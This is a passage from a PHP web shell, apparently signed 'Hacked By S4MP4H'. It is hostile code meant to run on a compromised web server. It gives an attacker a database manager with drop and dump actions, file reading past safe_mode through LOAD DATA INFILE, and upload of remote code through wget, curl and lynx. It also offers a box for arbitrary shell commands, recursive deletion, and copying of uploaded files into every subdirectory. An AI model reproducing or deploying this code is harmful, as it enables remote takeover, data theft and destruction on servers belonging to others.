4090 fwrite($fp,$ret);
4091 fclose($fp);
4092 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
4093 }
4094 }
4095 else {
4096 echo "<b>Dump: nothing to do!</b>";
4097 }
4098 }
4099 }
4100 if($diplay) {
4101 if(!empty($sql_tbl)) {
4102 if(empty($sql_tbl_x)) {
4103 $sql_tbl_x="browse";
4104 }
4105 $count=mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
4106 $count_row=mysql_fetch_array($count);
4107 mysql_free_result($count);
4108 $tbl_struct_result=mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
4109 $tbl_struct_fields=array();
4110 while($row=mysql_fetch_assoc($tbl_struct_result)) {
4111 $tbl_struct_fields[]=$row;
4112 }
4113 if(@$sql_ls>@$sql_le) {
4114 $sql_le=$sql_ls+$perpage;
4115 }
4116 if(empty($sql_tbl_page)) {
4117 $sql_tbl_page=0;
4118 }
4119 if(empty($sql_tbl_ls)) {
4120 $sql_tbl_ls=0;
4121 }
4122 if(empty($sql_tbl_le)) {
4123 $sql_tbl_le=30;
4124 }
4125 $perpage=$sql_tbl_le-$sql_tbl_ls;
4126 if(!is_numeric($perpage)) {
4127 $perpage=10;
4128 }
4129 $numpages=$count_row[0]/$perpage;
4130 $e=explode(" ",$sql_order);
4131 if(count($e)==2) {
4132 if($e[0]=="d") {
4133 $asc_desc="DESC";
4134 }
4135 else {
4136 $asc_desc="ASC";
4137 }
4138 $v="ORDER BY `".$e[1]."` ".$asc_desc." ";
4139 }
4140 else {
4141 $v="";
4142 }
4143 $query="SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
4144 $result=mysql_query($query)orprint(mysql_smarterror());
4145 echo "<center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
4146 echo "<hr size=\"1\" noshade>";
4147 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> ";
4148 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> ";
4149 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> ";
4150 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[ <b>Insert</b> ]</a> ";
4151 if($sql_tbl_x=="structure") {
4152 echo "<b>Under construction!</b>";
4153 }
4154 if($sql_tbl_x=="insert") {
4155 if(!is_array($sql_tbl_insert)) {
4156 $sql_tbl_insert=array();
4157 }
4158 if(!empty($sql_tbl_insert_radio)) {
4159 echo "<b>Under construction!</b>";
4160 }
4161 else {
4162 echo "<hr size=\"1\" noshade><br/><b>Inserting row into table:</b><br/>";
4163 if(!empty($sql_tbl_insert_q)) {
4164 $sql_query="SELECT * FROM `".$sql_tbl."`";
4165 $sql_query.=" WHERE".$sql_tbl_insert_q;
4166 $sql_query.=" LIMIT 1;";
4167 $result=mysql_query($sql_query,$sql_sock)orprint("<br/><br/>".mysql_smarterror());
4168 $values=mysql_fetch_assoc($result);
4169 mysql_free_result($result);
4170 }
4171 else {
4172 $values=array();
4173 }
4174 echo "<form method=\"POST\"><table width=\"1%\" class='tub'><tr><th><b>Field</b></th><th><b>Type</b></th><th><b>Function</b></th><th><b>Value</b></th></tr>";
4175 foreach($tbl_struct_fields as $field) {
4176 $name=$field["Field"];
4177 if(empty($sql_tbl_insert_q)) {
4178 $v="";
4179 }
4180 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\" class=\"inputz\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50 class=\"inputz\"></td></tr>";
4181 $i++;
4182 }
4183 echo "</table><br/>";
4184 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\"";
4185 if(empty($sql_tbl_insert_q)) {
4186 echo " checked";
4187 }
4188 echo "><b>Insert as new row</b>";
4189 if(!empty($sql_tbl_insert_q)) {
4190 echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>";
4191 echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";
4192 }
4193 echo "<br/><br/><input type=\"submit\" value=\"Confirm\" class=\"inputzbut\"></form>";
4194 }
4195 }
4196 if($sql_tbl_x=="browse") {
4197 $sql_tbl_ls=abs($sql_tbl_ls);
4198 $sql_tbl_le=abs($sql_tbl_le);
4199 echo "<hr size=\"1\" noshade>";
4200 echo "<b>Page: </b>";
4201 $b=0;
4202 for($i=0;$i<$numpages;$i++) {
4203 if(($i*$perpage!=$sql_tbl_ls)or($i*$perpage+$perpage!=$sql_tbl_le)) {
4204 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";
4205 }
4206 echo $i;
4207 if(($i*$perpage!=$sql_tbl_ls)or($i*$perpage+$perpage!=$sql_tbl_le)) {
4208 echo "</u></a>";
4209 }
4210 if(($i/30==round($i/30))and($i>0)) {
4211 echo "<br/>";
4212 }
4213 else {
4214 echo " ";
4215 }
4216 }
4217 if($i==0) {
4218 echo "empty";
4219 }
4220 echo "<br/><br/><form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\" class=\"inputz\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\" class=\"inputz\"> <input type=\"submit\" value=\"View\" class=\"inputzbut\"></form>";
4221 echo "<br/><form method=\"POST\">\n";
4222 echo "<table class='tub'><tr>";
4223 echo "<th width=\"25px\"><input type=\"checkbox\" onclick=\"checkAll(this)\" /></th>";
4224 for($i=0;$i<mysql_num_fields($result);$i++) {
4225 $v=mysql_field_name($result,$i);
4226 if($e[0]=="a") {
4227 $s="d";
4228 $m="asc";
4229 }
4230 else {
4231 $s="a";
4232 $m="desc";
4233 }
4234 echo "<th>";
4235 if(empty($e[0])) {
4236 $e[0]="a";
4237 }
4238 if(@$e[1]!=$v) {
4239 echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";
4240 }
4241 else {
4242 echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" alt=\"".$m."\"></a>";
4243 }
4244 echo "</th>";
4245 }
4246 echo "<th><font color=\"#00FF00\"><b>action</b></font></th>";
4247 echo "</tr>";
4248 while($row=mysql_fetch_array($result,MYSQL_ASSOC)) {
4249 echo "<tr>";
4250 $w="";
4251 $i=0;
4252 foreach($row as $k=>$v) {
4253 $name=mysql_field_name($result,$i);
4254 $w.=" `".$name."` = '".addslashes($v)."' AND";
4255 $i++;
4256 }
4257 if(count($row)>0) {
4258 $w=substr($w,0,strlen($w)-3);
4259 }
4260 echo "<td align='center' style='padding:0px;width:25px;'><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\" onchange=\"hilite(this);\"></td>";
4261 $i=0;
4262 foreach($row as $k=>$v) {
4263 $v=htmlspecialchars($v);
4264 if($v=="") {
4265 $v="<font color=\"#00FF00\">NULL</font>";
4266 }
4267 echo "<td>".$v."</td>";
4268 $i++;
4269 }
4270 echo "<td>";
4271 echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a>";
4272 echo " | ";
4273 echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
4274 echo "</td>";
4275 echo "</tr>";
4276 }
4277 mysql_free_result($result);
4278 echo "</table><hr size=\"1\" noshade><p align=\"left\"><input type=\"checkbox\" onclick=\"checkAll(this)\" name=\"dis\"/> <select name=\"sql_x\" class=\"inputz\">";
4279 echo "<option value=\"\">With selected:</option>";
4280 echo "<option value=\"deleterow\">Delete</option>";
4281 echo "</select> <input type=\"submit\" value=\"Confirm\" class=\"inputzbut\"></form></p>";
4282 }
4283 }
4284 else {
4285 $result=mysql_query("SHOW TABLE STATUS",$sql_sock);
4286 if(!$result) {
4287 echo mysql_smarterror();
4288 }
4289 else {
4290 echo '<form method="POST">
4291<table class="tub">
4292<tr><th width="25px"><input type="checkbox" onclick="checkAll(this)" /></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>';
4293 $i=0;
4294 $tsize=$trows=0;
4295 while($row=mysql_fetch_array($result,MYSQL_ASSOC)) {
4296 $tsize+=$row["Data_length"];
4297 $trows+=$row["Rows"];
4298 $size=view_size($row["Data_length"]);
4299 echo '<tr>
4300<td align="center" style="padding:0px;width:25px;"><input type="checkbox" name="boxtbl[]" value="'.$row["Name"].'" onchange="hilite(this);"></td>
4301<td><a href="'.$sql_surl.'sql_tbl='.urlencode($row["Name"]).'" class="gaya"><b>'.$row["Name"].'</b></a></td>
4302<td>'.$row["Rows"].'</td><td>'.$row["Engine"].'</td><td>'.$row["Create_time"].'</td><td>'.$row["Update_time"].'</td><td>'.$size.'</td>
4303<td><a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DELETE FROM `".$row["Name"]."`").'">Empty</a> | <a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DROP TABLE `".$row["Name"]."`").'">Drop</a> | <a href="'.$sql_surl.'sql_tbl_x=insert&sql_tbl='.$row["Name"].'">Insert</a></td>
4304</tr>';
4305 $i++;
4306 }
4307 echo "\t\t<tr>\n"."\t\t<th><input type=\"checkbox\" onclick=\"checkAll(this)\" /></th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
4308 echo '</tr>
4309</table>
4310<br/>
4311<div align="right">
4312<select name="sql_x" class="inputz">
4313<option value="">With selected:</option>
4314<option value="tbldrop">Drop</option>
4315<option value="tblempty">Empty</option>";
4316<option value="tbldump">Dump</option>";
4317<option value="tblcheck">Check table</option>";
4318<option value="tbloptimize">Optimize table</option>";
4319<option value="tblrepair">Repair table</option>";
4320<option value="tblanalyze">Analyze table</option>";
4321</select>
4322<input type="submit" value="Confirm" class="inputzbut">
4323</div>
4324</form>';
4325 mysql_free_result($result);
4326 }
4327 }
4328 }
4329 }
4330 }
4331 else {
4332 $xs=array("","newdb","serverstatus","servervars","processes","getfile");
4333 if(in_array($sql_x,$xs)) {
4334 echo '<table class="tab">
4335<tr>
4336<td style="border:1px solid #333333;padding:3px;"><b>Create new DB:</b>
4337<form action="'.$surl.'">
4338<input type="hidden" name="x" value="sql">
4339<input type="hidden" name="sql_x" value="newdb">
4340<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
4341<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
4342<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
4343<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
4344<input type="text" name="sql_newdb" size="20" class="inputz">
4345<input type="submit" value="Create" class="inputzbut">
4346</form>
4347</td>
4348<td style="border:1px solid #333333;padding:3px;"><b>View File:</b>
4349<form action="'.$surl.'">
4350<input type="hidden" name="x" value="sql">
4351<input type="hidden" name="sql_x" value="getfile">
4352<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
4353<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
4354<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
4355<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
4356<input type="text" name="sql_getfile" size="30" value="'.htmlspecialchars($sql_getfile).'" class="inputz">
4357<input type="submit" value="Get" class="inputzbut">
4358</form>
4359</td>
4360</tr>
4361</table>';
4362 }
4363 if(!empty($sql_x)) {
4364 echo "<hr size=\"1\" noshade>";
4365 if($sql_x=="newdb") {
4366 echo "<b>";
4367 if((mysql_create_db($sql_newdb))and(!empty($sql_newdb))) {
4368 echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br/>";
4369 }
4370 else {
4371 echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br/>Reason:</b> ".mysql_smarterror();
4372 }
4373 }
4374 if($sql_x=="serverstatus") {
4375 $result=mysql_query("SHOW STATUS",$sql_sock);
4376 echo "<center><b>Server status variables:</b><br/><br/>";
4377 echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
4378 while($row=mysql_fetch_array($result,MYSQL_NUM)) {
4379 echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";
4380 }
4381 echo "</table></center>";
4382 mysql_free_result($result);
4383 }
4384 if($sql_x=="servervars") {
4385 $result=mysql_query("SHOW VARIABLES",$sql_sock);
4386 echo "<center><b>Server variables:</b><br/><br/>";
4387 echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
4388 while($row=mysql_fetch_array($result,MYSQL_NUM)) {
4389 echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";
4390 }
4391 echo "</table>";
4392 mysql_free_result($result);
4393 }
4394 if($sql_x=="processes") {
4395 if(!empty($kill)) {
4396 $query="KILL ".$kill.";";
4397 $result=mysql_query($query,$sql_sock);
4398 echo "<b>Process #".$kill." was killed.</b>";
4399 }
4400 $result=mysql_query("SHOW PROCESSLIST",$sql_sock);
4401 echo "<center><b>Processes:</b><br/><br/>";
4402 echo "<table class='tub'><th><b>ID</b></th><th><b>USER</b></th><th><b>HOST</b></th><th><b>DB</b></th><th><b>COMMAND</b></th><th><b>TIME</b></th><th><b>STATE</b></th><th><b>INFO</b></th><th><b>Action</b></th></tr>";
4403 while($row=mysql_fetch_array($result,MYSQL_NUM)) {
4404 echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";
4405 }
4406 echo "</table>";
4407 mysql_free_result($result);
4408 }
4409 if($sql_x=="getfile") {
4410 $tmpdb=$sql_login."_tmpdb";
4411 $select=mysql_select_db($tmpdb);
4412 if(!$select) {
4413 mysql_create_db($tmpdb);
4414 $select=mysql_select_db($tmpdb);
4415 $created=!!$select;
4416 }
4417 if($select) {
4418 $created=FALSE;
4419 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
4420 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
4421 $result=mysql_query("SELECT * FROM tmp_file;");
4422 if(!$result) {
4423 echo "<b>Error in reading file (permision denied)!</b>";
4424 }
4425 else {
4426 for($i=0;$i<mysql_num_fields($result);$i++) {
4427 $name=mysql_field_name($result,$i);
4428 }
4429 $f="";
4430 while($row=mysql_fetch_array($result,MYSQL_ASSOC)) {
4431 $f.=join("\r\n",$row);
4432 }
4433 if(empty($f)) {
4434 echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br/>";
4435 }
4436 else {
4437 echo "<b>File \"".$sql_getfile."\":</b><br/>".nl2br(htmlspecialchars($f))."<br/>";
4438 }
4439 mysql_free_result($result);
4440 mysql_query("DROP TABLE tmp_file;");
4441 }
4442 }
4443 mysql_drop_db($tmpdb);
4444 }
4445 }
4446 }
4447 }
4448 echo '</td></tr>';
4449 if($sql_sock) {
4450 $affected=@mysql_affected_rows($sql_sock);
4451 if((!is_numeric($affected))or($affected<0)) {
4452 $affected=0;
4453 }
4454 echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
4455 }
4456 echo '</table>';
4457 }
4458 echo '</form>';
4459 }
4460}
4461elseif(isset($_GET['x'])&&($_GET['x']=='upload')) {
4462 if(isset($_POST['uploadcomp'])) {
4463 if(is_uploaded_file($_FILES['file']['tmp_name'])) {
4464 $path=magicboom($_POST['path']);
4465 $fname=$_FILES['file']['name'];
4466 $tmp_name=$_FILES['file']['tmp_name'];
4467 $pindah=$path.$fname;
4468 $stat=@move_uploaded_file($tmp_name,$pindah);
4469 $cp_filed=$_POST['cp_filed'];
4470 if($stat) {
4471 if(isset($cp_filed)) {
4472 $dir_open=opendir('.');
4473 while(false!==($filename=readdir($dir_open))) {
4474 if($filename!="."&&$filename!="..") {
4475 if(is_dir($filename)) {
4476 $link=$filename;
4477 copy($pindah,$path.$link."/".$fname);
4478 }
4479 }
4480 }
4481 closedir($dir_open);
4482 }
4483 $msg="<br/>File Uploaded To <span class='gaya'>$pindah</span>";
4484 }
4485 else
4486 $msg="<br/>Failed To Upload <span class='guyu'>$fname</span>";
4487 }
4488 else
4489 $msg="<br/>Failed To Upload <span class='guyu'>$fname</span>";
4490 }
4491 elseif(isset($_POST['uploadurl'])) {
4492 $pilihan=trim($_POST['pilihan']);
4493 $wurl=trim($_POST['wurl']);
4494 $path=magicboom($_POST['path']);
4495 $namafile=download($pilihan,$wurl);
4496 $pindah=$path.$namafile;
4497 if(is_file($pindah)) {
4498 $msg="<br/>File Uploaded To <span class='gaya'>$pindah</span>";
4499 }
4500 else
4501 $msg="<br/>Failed To Upload <span class='guyu'>$namafile</span>";
4502 }
4503 ?>
4504<form action="?y=<?php echo $pwd;?>&x=upload" enctype="multipart/form-data" method="post" style="-webkit-margin-before:35px;">
4505<table class="tabnet" style="width:325px;"><tr><th colspan="2">Upload From Computer</th></tr><tr><tr><td colspan="2" align="center"><input class="inputz" type="file" name="file" style="width:100%;" /></td></tr><tr><td><input type="checkbox" name="cp_filed" /> Copy To All Sub Directories</td><td><input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;"></td></tr><tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd;?>" /></td></tr></tr></table></form><table class="tabnet" style="width:32px;"><tr><th colspan="2">Upload From Url</th></tr><tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd;?>&x=upload"><table><tr><td>URL</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr><tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd;?>" /></td></tr><tr><td><select size="1" class="inputz" name="pilihan"><option value="wwget">wget</option><option value="wlynx">lynx</option><option value="wfread">fread</option><option value="wfetch">fetch</option><option value="wlinks">links</option><option value="wget">GET</option><option value="wcurl">curl</option></select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td></tr></form></table></td></tr></table><div style="text-align:center;margin:2px;"><?php echo $msg;?></div>
4506<?php
4507}
4508elseif(isset($_GET['x'])&&($_GET['x']=='shell')) {?>
4509<form action="?y=<?php echo $pwd;?>&x=shell" method="post" style="-webkit-margin-before:20px;"><br/><table class="cmdbox"><tr><td colspan="2"><textarea class="output" readonly>
4510<?php
4511if(isset($_POST['submitcmd'])) {
4512 echo @exe($_POST['cmd']);
4513 }
4514 ?>
4515</textarea><tr><td colspan="2"><?php echo $prompt;?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr></table>
4516<?php
4517}
4518else {
4519 if(isset($_GET['delete'])&&($_GET['delete']!="")) {
4520 $file=$_GET['delete'];
4521 @unlink($file);
4522 }
4523 elseif(isset($_GET['fdelete'])&&($_GET['fdelete']!="")) {
4524 if(@exe("ls -a ".$_GET['fdelete'])) {
4525 @exe("rm -r ".$_GET['fdelete']);
4526 }
4527 else
4528 $dir=$_GET['fdelete'];
4529 delTree($dir);
4530 }
4531 elseif(isset($_GET['mkdir'])&&($_GET['mkdir']!="")) {
4532 $path=$pwd.$_GET['mkdir'];
4533 @mkdir($path);
4534 }
4535 $buff=showdir($pwd,$prompt);
4536 echo $buff;
4537}
4538?>
4539<script language='javascript'>
4540function checkAll(bx){
4541var cbs = document.getElementsByTagName('input');
4542for(var i=0; i < cbs.length; i++){
4543if(cbs[i].type == 'checkbox' && cbs[i].name != 'dis'){
4544cbs[i].checked = bx.checked;
4545var c = cbs[i].parentElement.parentElement;
4546if(cbs[i].checked) c.className = 'cbox_selected';
4547else c.className = '';
4548}
4549}
4550}
4551function hilite(el){
4552var c = el.parentElement.parentElement;
4553if(el.checked) c.className = 'cbox_selected';
4554else c.className = '';
4555}
4556function optionCheck(){
4557var option = document.getElementById("options").value;
4558if(option == "pl"){
4559document.getElementById("wow").value = "shell.pl";
4560}
4561if(option == "py"){
4562document.getElementById("wow").value = "shell.py";
4563}
4564if(option == "asp"){
4565document.getElementById("wow").value = "shell.asp";
4566}
4567if(option == "aspx"){
4568document.getElementById("wow").value = "shell.aspx";
4569}
4570if(option == "jsp"){
4571document.getElementById("wow").value = "shell.jsp";
4572}
4573}
4574setInterval(ganti, 100);
4575function ganti(){
4576var isi = document.getElementById("portname").value;
4577var wew = document.getElementById("aisi");
4578wew.innerHTML = "http://<?php echo $server_ip;?>:"+isi;
4579wew.href = "http://<?php echo $server_ip;?>:"+isi;
4580}
4581function ubah(){
4582var sebelum = document.getElementById("upfile").value;
4583var sesudah = document.getElementById("namefile");
4584sesudah.value = sebelum.split(/[\\/]/).pop();;
4585}
4586</script>
4587<?php
4588echo $jsc;
4589?>
4590<center>
4591<div id="spoiler" style="display:none;">
4592<form action="?y=<?php echo $pwd;?>" enctype="multipart/form-data" method="post"><table class="tabnet" style="width:325px;"><tr><th colspan="2">Upload From Computer</th></tr><tr><tr><td colspan="2" align="center"><input class="inputz" type="file" name="file" id="upfile" style="width:100%;" onchange="ubah()" /></td></tr><tr><td width="70px"> New Name : </td><td><input class="inputz" type="text" name="namefile" id="namefile" style="width:100%;" /></td></tr><tr><td colspan="2"><input type="checkbox" name="cp_files" /> Copy To All Sub Directories <span style="float:right;"><input type="submit" name="uploadcomps" class="inputzbut" value="Go !" style="width:80px;"></span></td></tr><tr><td colspan="2"><input type="text" class="inputz" style="width:100%;" name="path" value="<?php echo $pwd;?>" /></td></tr></tr></table></form>
4593<?php
4594if(isset($_POST['uploadcomps'])) {
4595 if(is_uploaded_file($_FILES['file']['tmp_name'])) {
4596 $path=magicboom($_POST['path']);
4597 $fname=$_FILES['file']['name'];
4598 $tmp_name=$_FILES['file']['tmp_name'];
4599 $newfname=$_POST['namefile'];
4600 $pindah=$path.$newfname;
4601 $stat=@move_uploaded_file($tmp_name,$pindah);
4602 $cp_files=$_POST['cp_files'];
4603 if($stat) {
4604 if(isset($cp_files)) {
4605 $dir_open=opendir('.');
4606 while(false!==($filename=readdir($dir_open))) {
4607 if($filename!="."&&$filename!="..") {
4608 if(is_dir($filename)) {
4609 $link=$filename;
4610 copy($pindah,$path.$link."/".$fname);
4611 }
4612 }
4613 }
4614 closedir($dir_open);
4615 }
4616 echo "<script language='javascript'>
4617alert('File Uploaded To $pindah');
4618window.location.href = '?y=$pwd';
4619</script>";
4620 }
4621 else {
4622 echo "<script language='javascript'>
4623alert('Failed To Upload $fname');
4624window.location.href = '?y=$pwd';
4625</script>";
4626 }
4627 }
4628 else {
4629 echo "<script language='javascript'>
4630alert('Failed To Upload $fname');
4631window.location.href = '?y=$pwd';
4632</script>";
4633 }
4634}
4635?>
4636</div>
4637<br/>
4638<div class="footer"><div class="info">[ Shell By <a href="http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H" target="_blank"><span class="gaya"><? echo $xName;?></span></a> ]</div><div class="jaya">Allright Reserved © <?php echo date("Y",time())." ".$xName;?></div></div></center></script></div></body></html>